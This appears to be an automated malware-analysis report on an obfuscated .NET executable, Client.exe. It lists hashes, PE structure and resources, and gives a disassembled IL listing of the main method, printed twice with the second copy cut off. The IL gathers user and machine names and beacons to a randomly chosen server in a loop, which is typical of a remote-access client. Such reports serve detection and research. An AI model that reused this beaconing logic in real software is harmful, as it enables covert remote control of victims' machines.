Suspicious
Suspect

18ef22f92a32fcb74643b63a768d37b3

PE Executable
|
MD5: 18ef22f92a32fcb74643b63a768d37b3
|
Size: 511.49 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very high

Hash
Hash Value
MD5
18ef22f92a32fcb74643b63a768d37b3
Sha1
77f700b1f9784ba90473e6f51167e1404cf06c9e
Sha256
e6b6095b3fad0cc8387668a688aa9a64b4df657db688f9e71d33b3fbc9c32b3f
Sha384
41eb4de4987bf8e20fce0691e6272fdb638deabdb359763413d8dbd304764e870b0de13e42b556196782ab95931c1d1c
Sha512
7066777c00f70965c1a7945e8fdfccd9cf329f30df1bb51e99041b0dc5a0623019566eb15174da6e68add5e95ae8731fabcb8f69ebd52c703d618cc9e6a3382f
SSDeep
12288:/ykV1cir6vyQiekWu1r46xSc2KyPAAQkd82+h8dKx:MvPkz1afx7Qkd8fW
TLSH
2EB409257FA48E00D580287EC97E7A09CB12E4F22502A347374AF7A65D459DEEE2C3D7

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
s9rmcax0ldp2fl39v
5vl9g11n592cuoh
Information
Name
Value
Info

PE Detect: PeReader OK (file layout)

Module Name

Client.exe

Full Name

Client.exe

EntryPoint

System.Void saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::VDtnDkLXuchd(System.String[])

Scope Name

Client.exe

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

Client

Assembly Version

1.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.0

Total Strings

595

Main Method

System.Void saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::VDtnDkLXuchd(System.String[])

Main IL Instruction Count

167

Main IL

call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::nxQLAvjETTazNECmYzotHpiKs() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::RvzhAhWOvaFIm() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::KDqenFZtdkLXn() stloc V_3 nop <null> ldloc V_3 call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::pxPGTpdnFlStcyIbhPNejE() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::EQpWStGveT() br IL_000E: nop call System.Void saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::EQpWStGveT() call System.Void RkPOCxEFQOWFBuHe.frXsYYlRRhWoxl::jlJWhhFnmOYUzTyFjtHEDB() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::xblFtEddFatmY call System.String LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::ZuYanUxOJYqMhTgPO() call System.String wuZmNYFPOzDUgn.uQVgKgeQjnHKjYRPp::FNVqxjNUNGMkBdTqFhacZrjjV(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::djzHljGWyfUsofIuuhtqce call System.Void HDDKyzyYouBx.ewveaougspeO::FubdKGFBMFSgnxLifdXW() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::djzHljGWyfUsofIuuhtqce call System.Boolean rvkJNtrmfeCQHVZD.CwhuIzPwrndnynZixcOZxoJ::iRwgpGjozF(System.String) brtrue IL_0080: call System.Void rvkJNtrmfeCQHVZD.ReSCHCXJTBxAen::wEcJiQunXwGchTYtqUzc() leave IL_0283: ret call System.Void rvkJNtrmfeCQHVZD.ReSCHCXJTBxAen::wEcJiQunXwGchTYtqUzc() call System.Void qkShAPPaVXVXVo.PRQXMVfbkMyfFmZFWdpBv::hBqXheXVqOylhWzuWw() ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb ldfld System.Boolean EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::fzlpvQiqBhq brtrue IL_026E: call System.Int32 
LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::UPNWFBrvrQVoKENMwtChMoOzf() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::DbbmZbcKmqRGKmD call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::DWmlYRPWduhZyLzpwfWyEMuda() newarr System.Char dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::BCwJIFlxLkgEFWpPpyvZK() call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::iaRyNFuqbJKnQMZ() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random qkShAPPaVXVXVo.PRQXMVfbkMyfFmZFWdpBv::nZaKKZGfHJWyTEPENMtn ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::lboAzPIsaAIpXvh() newarr System.Char dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::alUWsKsfDV() call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::XtSGdpVNTlJR() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::RYXNxETfbJMerDa() ldelem System.String call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::jIweGlyItfzBiOPQUC() newarr System.Char dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::UmehyBcvkFb() call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::lumkcNmLgaPTSFRxNtwKp() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb callvirt System.Void EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::piIGsMWXPMYLMaDotuiTfy() ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb ldloc V_1 call System.Int32 
LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::GoEbxcdqNCStNGvdnDhqYuWLP() ldelem System.String ldloc V_2 ldsfld System.Random qkShAPPaVXVXVo.PRQXMVfbkMyfFmZFWdpBv::nZaKKZGfHJWyTEPENMtn ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::nUkJAMliaYACb(System.String,System.String) ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb ldfld System.Boolean EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::fzlpvQiqBhq brfalse IL_026E: call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::UPNWFBrvrQVoKENMwtChMoOzf() ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb newobj System.Void qkShAPPaVXVXVo.LAzrhqeBYUzrFDqxirCeGult::.ctor(EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep) stfld qkShAPPaVXVXVo.LAzrhqeBYUzrFDqxirCeGult EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::pSoyXgjhZp ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb newobj System.Void HDDKyzyYouBx.VUuQQNBQyjGZp::.ctor(EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep) stfld HDDKyzyYouBx.VUuQQNBQyjGZp EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::MAbGvaiuOlwe ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::jfhrJQwmoygBPJhqMNAZrKBk() newarr System.Object dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::sdzbMRtLEsy() call System.String LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::KgKcMcanSixanCMpSqwHvgOFC() 
call System.String wuZmNYFPOzDUgn.uQVgKgeQjnHKjYRPp::FNVqxjNUNGMkBdTqFhacZrjjV(System.String) stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::VtCwbSxxloXI() call System.Byte[] qkShAPPaVXVXVo.PRQXMVfbkMyfFmZFWdpBv::zHQdhSCZXwj() stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::hJKqCZexmQmxLbgmqKQj() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::JWiXwRzImcMngDrJVbggwdCp stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::qTycQsDmTEFqtfHjUCTU() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::iathqBsVyXIGEZ stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::jdPyPqRKvdGYA() call System.String System.Environment::get_UserName() call System.String LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::AtwCsCmzSt() call System.String wuZmNYFPOzDUgn.uQVgKgeQjnHKjYRPp::FNVqxjNUNGMkBdTqFhacZrjjV(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::qLNlhaKSMhHSwYDVIxOWGqi() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::LSrDRzLnBHmaXcIhWykalZkqB stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::ABmbXazRsoRXHQmtARQ() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::JxTfRdPnABfEKZcBgje stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::rwtsHaUJKejzcjkfoiul() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::mphXSiZfLm stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::pZIGgNsKVVpZAmEHtUxF() ldsfld System.String 
saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::NSdDYkOhKtVrCMaVzu stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::HOESuXfGFRXfACWllbMcyp() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::BBmpOTVpIKkcGCSoKxkt stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::uZcwgYvOxfsh() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::QIFNEjWKCrthjWmbTzwO stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::DolqMEPESuzkh() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::OnYOPaiDiHpI stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::HtkcrSGKsRayiKCa() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::IoaNoqCBUlnCfPPJBnRRuxm stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::IULhwpWQuZDcfcMzCnVMCBPEt() call System.String qkShAPPaVXVXVo.PRQXMVfbkMyfFmZFWdpBv::ostialENJDGEAuI() stelem.ref <null> call System.Byte[] McdttMEIToAEqGRcJucZglAc.DpxQHTBHQJNJeXstuTHePYOTq::NiHpsLzTVFwOiebeZo(System.Object[]) callvirt System.Void EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::zbxaZwlbBJr(System.Byte[]) call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::UPNWFBrvrQVoKENMwtChMoOzf() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb pop <null> leave IL_0283: ret ret <null>

Module Name

Client.exe

Full Name

Client.exe

EntryPoint

System.Void saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::VDtnDkLXuchd(System.String[])

Scope Name

Client.exe

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

Client

Assembly Version

1.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.0

Total Strings

595

Main Method

System.Void saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::VDtnDkLXuchd(System.String[])

Main IL Instruction Count

167

Main IL

call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::nxQLAvjETTazNECmYzotHpiKs() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::RvzhAhWOvaFIm() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::KDqenFZtdkLXn() stloc V_3 nop <null> ldloc V_3 call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::pxPGTpdnFlStcyIbhPNejE() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::EQpWStGveT() br IL_000E: nop call System.Void saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::EQpWStGveT() call System.Void RkPOCxEFQOWFBuHe.frXsYYlRRhWoxl::jlJWhhFnmOYUzTyFjtHEDB() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::xblFtEddFatmY call System.String LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::ZuYanUxOJYqMhTgPO() call System.String wuZmNYFPOzDUgn.uQVgKgeQjnHKjYRPp::FNVqxjNUNGMkBdTqFhacZrjjV(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::djzHljGWyfUsofIuuhtqce call System.Void HDDKyzyYouBx.ewveaougspeO::FubdKGFBMFSgnxLifdXW() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::djzHljGWyfUsofIuuhtqce call System.Boolean rvkJNtrmfeCQHVZD.CwhuIzPwrndnynZixcOZxoJ::iRwgpGjozF(System.String) brtrue IL_0080: call System.Void rvkJNtrmfeCQHVZD.ReSCHCXJTBxAen::wEcJiQunXwGchTYtqUzc() leave IL_0283: ret call System.Void rvkJNtrmfeCQHVZD.ReSCHCXJTBxAen::wEcJiQunXwGchTYtqUzc() call System.Void qkShAPPaVXVXVo.PRQXMVfbkMyfFmZFWdpBv::hBqXheXVqOylhWzuWw() ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb ldfld System.Boolean EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::fzlpvQiqBhq brtrue IL_026E: call System.Int32 
LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::UPNWFBrvrQVoKENMwtChMoOzf() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::DbbmZbcKmqRGKmD call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::DWmlYRPWduhZyLzpwfWyEMuda() newarr System.Char dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::BCwJIFlxLkgEFWpPpyvZK() call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::iaRyNFuqbJKnQMZ() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random qkShAPPaVXVXVo.PRQXMVfbkMyfFmZFWdpBv::nZaKKZGfHJWyTEPENMtn ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::lboAzPIsaAIpXvh() newarr System.Char dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::alUWsKsfDV() call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::XtSGdpVNTlJR() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::RYXNxETfbJMerDa() ldelem System.String call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::jIweGlyItfzBiOPQUC() newarr System.Char dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::UmehyBcvkFb() call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::lumkcNmLgaPTSFRxNtwKp() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb callvirt System.Void EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::piIGsMWXPMYLMaDotuiTfy() ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb ldloc V_1 call System.Int32 
LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::GoEbxcdqNCStNGvdnDhqYuWLP() ldelem System.String ldloc V_2 ldsfld System.Random qkShAPPaVXVXVo.PRQXMVfbkMyfFmZFWdpBv::nZaKKZGfHJWyTEPENMtn ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::nUkJAMliaYACb(System.String,System.String) ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb ldfld System.Boolean EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::fzlpvQiqBhq brfalse IL_026E: call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::UPNWFBrvrQVoKENMwtChMoOzf() ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb newobj System.Void qkShAPPaVXVXVo.LAzrhqeBYUzrFDqxirCeGult::.ctor(EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep) stfld qkShAPPaVXVXVo.LAzrhqeBYUzrFDqxirCeGult EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::pSoyXgjhZp ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb newobj System.Void HDDKyzyYouBx.VUuQQNBQyjGZp::.ctor(EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep) stfld HDDKyzyYouBx.VUuQQNBQyjGZp EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::MAbGvaiuOlwe ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::jfhrJQwmoygBPJhqMNAZrKBk() newarr System.Object dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::sdzbMRtLEsy() call System.String LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::KgKcMcanSixanCMpSqwHvgOFC() 
call System.String wuZmNYFPOzDUgn.uQVgKgeQjnHKjYRPp::FNVqxjNUNGMkBdTqFhacZrjjV(System.String) stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::VtCwbSxxloXI() call System.Byte[] qkShAPPaVXVXVo.PRQXMVfbkMyfFmZFWdpBv::zHQdhSCZXwj() stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::hJKqCZexmQmxLbgmqKQj() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::JWiXwRzImcMngDrJVbggwdCp stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::qTycQsDmTEFqtfHjUCTU() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::iathqBsVyXIGEZ stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::jdPyPqRKvdGYA() call System.String System.Environment::get_UserName() call System.String LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::AtwCsCmzSt() call System.String wuZmNYFPOzDUgn.uQVgKgeQjnHKjYRPp::FNVqxjNUNGMkBdTqFhacZrjjV(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::qLNlhaKSMhHSwYDVIxOWGqi() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::LSrDRzLnBHmaXcIhWykalZkqB stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::ABmbXazRsoRXHQmtARQ() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::JxTfRdPnABfEKZcBgje stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::rwtsHaUJKejzcjkfoiul() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::mphXSiZfLm stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::pZIGgNsKVVpZAmEHtUxF() ldsfld System.String 
saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::NSdDYkOhKtVrCMaVzu stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::HOESuXfGFRXfACWllbMcyp() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::BBmpOTVpIKkcGCSoKxkt stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::uZcwgYvOxfsh() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::QIFNEjWKCrthjWmbTzwO stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::DolqMEPESuzkh() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::OnYOPaiDiHpI stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::HtkcrSGKsRayiKCa() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::IoaNoqCBUlnCfPPJBnRRuxm stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::IULhwpWQuZDcfcMzCnVMCBPEt() call System.String qkShAPPaVXVXVo.PRQXMVfbkMyfFmZFWdpBv::ostialENJDGEAuI() stelem.ref <null> call System.Byte[] McdttMEIToAEqGRcJucZglAc.DpxQHTBHQJNJeXstuTHePYOTq::NiHpsLzTVFwOiebeZo(System.Object[]) callvirt System.Void EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::zbxaZwlbBJr(System.Byte[]) call System.Int32 